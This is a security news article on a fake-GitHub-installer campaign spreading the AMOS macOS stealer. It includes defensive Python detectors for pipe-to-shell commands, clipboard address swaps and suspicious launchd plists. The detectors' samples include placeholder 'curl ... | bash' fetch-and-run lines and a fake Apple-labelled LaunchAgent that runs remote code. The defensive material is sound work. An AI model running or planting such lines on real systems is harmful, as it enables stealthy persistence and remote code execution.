Fake GitHub Installers Used To Spread AMOS To macOS Users
Cybercriminals have increasingly weaponized trust: instead of exploiting zero-day flaws, they trick users into installing malicious software that impersonates legitimate apps. In a large-scale campaign observed by Malwarebytes in 2025, threat actors published convincing GitHub pages that posed as downloads for well-known macOS utilities, including Malwarebytes and LastPass.
The GitHub pages directed victims to run one-line terminal installers that fetched and executed remote scripts. Those installers bypassed normal review and download controls by using "curl ... | bash" style terminal commands, making the infection routine as simple as copying a command from a webpage and pressing Enter.
This vector distributed an information stealer known as AMOS, commonly also tracked as AtomicStealer or Atomic Stealer, and security teams rapidly flagged the technique as a major social-engineering threat to macOS users.
The impersonation was broad and systematic. Attackers created pages and search-engine-optimized listings that mimicked dozens of legitimate projects, so that casual searches or paid ads could funnel victims to the malicious GitHub repositories.
Once a victim followed the repository's "Get" instructions, the installation chain pulled a shell script from a recently registered domain and executed it, giving the attacker an immediate foothold.
Malwarebytes and other defenders emphasized that copying and running commands from untrusted pages, particularly those that pipe remote content directly to Bash, removes the user's last line of defense and enables stealthy delivery of stealers like AMOS.
Malwarebytes argues that these attacks should be considered dangerous for the following reasons:
- The attackers relied on brand recognition and developer reputations to lower suspicion; pages that appear under a GitHub domain or in search results often look authoritative to nontechnical users.
- The installation instructions deliberately used terminal commands that execute remotely downloaded scripts, which bypass many browser-level download protections and give attackers complete control.
That first half of the attack chain, convincing victims to install the malware themselves, is the most reliable part of the adversary's playbook. Researchers noted that blocking such terminal commands, educating users not to copy and execute terminal commands from untrusted pages, ensuring downloads come from vendor sites, and using endpoint protection with web filtering significantly reduce the chance of an AMOS infection.
Malwarebytes and other vendors updated detections and web protections to intercept the malicious domains and flagged the GitHub pages as fraudulent.
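As an added illustration of the install pattern described above (this is example code written for this article, not code from Malwarebytes, PCrisk or the campaign), the following Python snippet flags process command lines that fetch remote content and hand it straight to a shell, including the "$(curl ...)" and base64-decode variants of the same trick. The events, user names and the installer.example domain are constructed placeholders, not real indicators.

```python
"""Flag shell one-liners that pipe remote content into an interpreter.

Added example for this article (not Malwarebytes, PCrisk or campaign code).
It runs a few regexes over constructed process-execution events of the kind an
EDR sensor or the macOS unified log would record, and returns the ones that
fit the 'curl ... | bash' pattern described above, including the variants
that hide the same behaviour behind $(...) or base64.
"""
import re
from dataclasses import dataclass, field

FETCHERS = r"(?:curl|wget)\b[^|;&]*"          # download tool plus its arguments
INTERPRETERS = r"(?:bash|sh|zsh|python3?|perl|ruby|osascript)"
QUOTE = "[\"']?"                               # optional quote before $( ... )

PATTERNS = [
    # curl -fsSL https://host/x.sh | bash        (also "| sudo bash")
    re.compile(rf"{FETCHERS}\|\s*(?:sudo\s+)?{INTERPRETERS}\b"),
    # bash -c "$(curl -fsSL https://host/x.sh)"
    re.compile(rf"{INTERPRETERS}\s+(?:-c\s+)?{QUOTE}\$\(\s*(?:curl|wget)\b"),
    # sh <(curl ...)                             (process substitution)
    re.compile(rf"{INTERPRETERS}\s+<\(\s*(?:curl|wget)\b"),
    # echo <b64> | base64 -d | sh                (content hidden from the user)
    re.compile(rf"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:sudo\s+)?{INTERPRETERS}\b"),
]
URL_RE = re.compile(r"https?://[^\s\"'|;)]+")

@dataclass
class Finding:
    pid: int
    user: str
    command: str
    urls: list = field(default_factory=list)

def is_remote_pipe_to_shell(command: str) -> bool:
    """True if the command line fetches remote content and executes it directly."""
    return any(p.search(command) for p in PATTERNS)

def scan_events(events) -> list:
    """Return a Finding for every event whose command line matches."""
    return [
        Finding(ev["pid"], ev["user"], ev["command"], URL_RE.findall(ev["command"]))
        for ev in events
        if is_remote_pipe_to_shell(ev["command"])
    ]

# Constructed sample events; installer.example is a placeholder, not a real IoC.
SAMPLE_EVENTS = [
    {"pid": 4101, "user": "alice", "command": "curl -fsSL https://installer.example/get.sh | bash"},
    {"pid": 4102, "user": "alice", "command": "ls -la ~/Library/LaunchAgents"},
    {"pid": 4103, "user": "bob",   "command": 'bash -c "$(curl -fsSL https://installer.example/get.sh)"'},
    {"pid": 4104, "user": "bob",   "command": "curl -O https://example.org/report.pdf"},
    {"pid": 4105, "user": "carol", "command": "echo aGVsbG8K | base64 -d | sh"},
    {"pid": 4106, "user": "carol", "command": "brew install wget"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"pid={f.pid} user={f.user} urls={f.urls}\n  {f.command}")
```

A plain download (event 4104) is not flagged, because the point is execution of unreviewed content rather than the use of curl; the URLs pulled out of each finding are what an analyst would then check against domain-age and reputation data.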
Previous AMOS Campaigns and Malware Evolution
AMOS's rise to malware prominence did not happen overnight; security vendors traced a succession of macOS-focused campaigns through 2023 and 2024 that refined distribution tactics and capability sets. Historically, actors used cracked or pirated macOS apps and repackaged installers distributed through torrent sites and shady forums to lure victims.
Over time, the stealer evolved: multiple telemetry reports documented modules for harvesting browser cookies, saved credentials, crypto wallet data, and system information, the data a threat actor needs to monetize a compromised system illegally. Detection and incident response write-ups from security teams underscore that AMOS actors adapt quickly to defensive changes.
More recently, researchers observed a capability that dramatically increased the stealer's effectiveness: clipboard hijacking. By monitoring and replacing clipboard contents, AMOS can intercept cryptocurrency addresses copied by victims and substitute attacker-controlled addresses, a silent theft method that is hard for victims to spot. This shift illustrates the stealer's focus on high-value data extraction and covert monetization, especially against users handling crypto on macOS.
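The clipboard substitution described above has a recognizable shape when seen from a monitor that samples the clipboard: one address-like string is replaced by a different address of the same family almost immediately, with no time for a human to have copied something else. The following Python example (written for this article, not code from Malwarebytes, PCrisk or AMOS) applies that heuristic to a constructed timeline of clipboard snapshots; on a real Mac the snapshots would come from polling `pbpaste` or the pasteboard change count, and the addresses below are made-up strings that merely fit the formats.

```python
"""Detect clipboard address substitution from a series of clipboard snapshots.

Added example for this article, not code from Malwarebytes, PCrisk or AMOS.
Heuristic: an address-shaped value replaced by a different address of the
same family within a couple of seconds is treated as a substitution.
"""
import re
from dataclasses import dataclass

# Rough shapes of common address formats; a real monitor would also validate checksums.
ADDRESS_TYPES = {
    "btc-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[a-z0-9]{25,59}$"),
    "eth":        re.compile(r"^0x[0-9a-fA-F]{40}$"),
}
SUBSTITUTION_WINDOW_S = 2.0  # a deliberate re-copy by a person takes longer than this

def address_type(text: str):
    """Return the address family `text` looks like, or None."""
    s = text.strip()
    for name, rx in ADDRESS_TYPES.items():
        if rx.match(s):
            return name
    return None

@dataclass
class Substitution:
    at: float          # timestamp of the snapshot that showed the replacement
    kind: str          # address family
    original: str
    replacement: str

def detect_substitutions(snapshots) -> list:
    """snapshots: list of (timestamp_seconds, clipboard_text) in time order."""
    alerts = []
    prev_t, prev_text = None, None
    for t, text in snapshots:
        if prev_text is not None and text != prev_text:
            old_kind, new_kind = address_type(prev_text), address_type(text)
            if old_kind and old_kind == new_kind and t - prev_t <= SUBSTITUTION_WINDOW_S:
                alerts.append(Substitution(t, new_kind, prev_text.strip(), text.strip()))
        prev_t, prev_text = t, text
    return alerts

# Constructed timeline: a BTC address copied at t=10.0 changes to a different
# BTC address 0.3 s later; the two ETH addresses are 35 s apart (a normal re-copy).
SAMPLE_SNAPSHOTS = [
    (0.0, "meeting notes"),
    (10.0, "bc1qexampleuseraddress0000000000000000000"),
    (10.3, "bc1qexampleattackeraddress00000000000000"),
    (45.0, "0x" + "1" * 40),
    (80.0, "0x" + "2" * 40),
]

if __name__ == "__main__":
    for a in detect_substitutions(SAMPLE_SNAPSHOTS):
        print(f"t={a.at}s {a.kind}: {a.original} -> {a.replacement}")
```

The window is the whole heuristic: a user who copies two addresses in a row produces the same before/after pair, but not within a fraction of a second, which is why the second ETH change in the sample timeline is left alone.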
At a high level, AMOS operates as a multi-stage info stealer. The initial stage is typically a downloaded payload (often installed via an automated shell install or packaged with a cracked app) that establishes persistence on macOS by writing LaunchAgents or LaunchDaemons and, in some variants, a helper binary.
Once persistent, the stealer performs reconnaissance and data harvesting routines: enumeration of installed browsers, extraction of stored credentials and cookies, scanning for known wallet apps and their artifacts, and collection of system identifiers. Operators often combine exfiltration with periodic C2 polling and encrypted uploads to cloud-hosted storage or attacker-controlled endpoints.
Common indicators of compromise include:
- Persistence artifacts: entries in ~/Library/LaunchAgents or /Library/LaunchDaemons, and suspicious login items.
- Network indicators: POSTs to recently registered domains or uploads to cloud storage services shortly after an install event; note that many operators use encryption and legitimate cloud providers to blend in.
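The persistence traits described in the two paragraphs above and the LaunchAgents/LaunchDaemons indicator in the list can be turned into a triage pass over launchd property lists. The Python example below was written for this article (it is not Malwarebytes, PCrisk or AMOS code): it parses plists with the standard-library plistlib module, applies a handful of heuristics (execution from transient directories, fetch-and-pipe command lines inside the agent, hidden directories, Apple-style labels in a per-user folder, RunAtLoad plus KeepAlive), and returns the reasons a file deserves a look. The two embedded plists are constructed samples and updates.example is a placeholder domain; scan_launchd_dirs() walks the real directories when run on a Mac.

```python
"""Triage launchd plists for the persistence traits listed above.

Added example for this article, not Malwarebytes, PCrisk or AMOS code.
It parses LaunchAgent/LaunchDaemon plists with plistlib, applies a few
heuristics and returns the reasons a file deserves a closer look. The two
plists embedded below are constructed; scan_launchd_dirs() walks the real
directories when run on a Mac.
"""
import plistlib
import re
from pathlib import Path

LAUNCHD_DIRS = [
    Path.home() / "Library/LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]
# Locations a legitimate vendor agent almost never executes from.
TRANSIENT_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/",
                  "/private/var/folders/", "/Users/Shared/")
APPLE_LABEL = re.compile(r"^com\.apple\.")
# Fetch-and-pipe or decode-and-pipe command lines inside the agent itself.
REMOTE_EXEC = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b|base64\s+(?:-d|--decode)\b")
HIDDEN_DIR = re.compile(r"/\.[^/ ]+/")

def program_of(plist: dict) -> str:
    """Rebuild the command line launchd would run (Program overrides argv[0])."""
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    if "Program" in plist:
        args = [str(plist["Program"])] + args[1:]
    return " ".join(args)

def triage_plist(path: str, data: bytes) -> list:
    """Return human-readable reasons this plist looks suspicious ([] if none)."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # a malformed plist is itself worth a look
        return [f"unparseable plist: {exc}"]
    cmd = program_of(plist)
    label = str(plist.get("Label", ""))
    reasons = []
    if any(d in cmd for d in TRANSIENT_DIRS):
        reasons.append(f"executes from a transient directory: {cmd}")
    if REMOTE_EXEC.search(cmd):
        reasons.append("command fetches or decodes content and pipes it to a shell")
    if HIDDEN_DIR.search(cmd):
        reasons.append("program path contains a hidden directory")
    if APPLE_LABEL.match(label) and "/Users/" in path:
        reasons.append(f"Apple-style label '{label}' in a per-user LaunchAgents folder")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: relaunches whenever it is killed")
    if not label:
        reasons.append("missing Label key")
    return reasons

def scan_launchd_dirs(dirs=LAUNCHD_DIRS) -> dict:
    """Triage every plist in the real launchd directories; returns {path: reasons}."""
    results = {}
    for d in dirs:
        if d.is_dir():
            for p in d.glob("*.plist"):
                try:
                    reasons = triage_plist(str(p), p.read_bytes())
                except OSError as exc:
                    reasons = [f"unreadable: {exc}"]
                if reasons:
                    results[str(p)] = reasons
    return results

# Constructed samples (updates.example is a placeholder, not a real indicator).
SUSPICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>curl -fsSL https://updates.example/a.sh | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backupagent</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/BackupApp.app/Contents/MacOS/backup-agent</string>
    <string>--daemon</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    print(triage_plist("/Users/alice/Library/LaunchAgents/com.apple.softwareupdate.helper.plist", SUSPICIOUS))
    print(triage_plist("/Library/LaunchAgents/com.example.backupagent.plist", BENIGN))
    for path, reasons in scan_launchd_dirs().items():
        print(path, reasons)
```

None of these checks is proof on its own (vendor agents legitimately use RunAtLoad, and Apple-style labels are only odd in a per-user folder), which is why the function returns reasons for an analyst rather than a verdict.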
The attackers' operational security complicates detection. Threat actors frequently update command-and-control (C2) infrastructure, scramble payload signatures, and obfuscate code. Using standard macOS command-line tools in install scripts, combined with the native feel of GitHub-hosted pages, reduces the number of noisy artifacts that traditional network-security tools would flag.
Modern endpoint detection is better placed to defend against AMOS infections: behavioral models that monitor abnormal persistence modifications, credential-scraping behaviors, clipboard modification attempts, and unusual outbound flows offer more protection than reliance on static signatures alone.
The convergence of social engineering (fake vendor pages and ads), simple but powerful installer commands, and a capable info stealer makes AMOS a persistent risk for macOS users.
The campaign's pivot to impersonating trusted brands like Malwarebytes and LastPass underscores the need for defensive hygiene: only trust vendor-hosted downloads, avoid running shell one-liners copied from search results, use reputable endpoint protections with web filtering, and monitor for the specific persistence and clipboard manipulation behaviors associated with AMOS.
As defenders update tooling and public awareness grows, the most effective mitigations will remain simple but effective: verify sources, scrutinize install commands, and treat unsolicited "helpful" installer snippets as potential attack vectors.
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.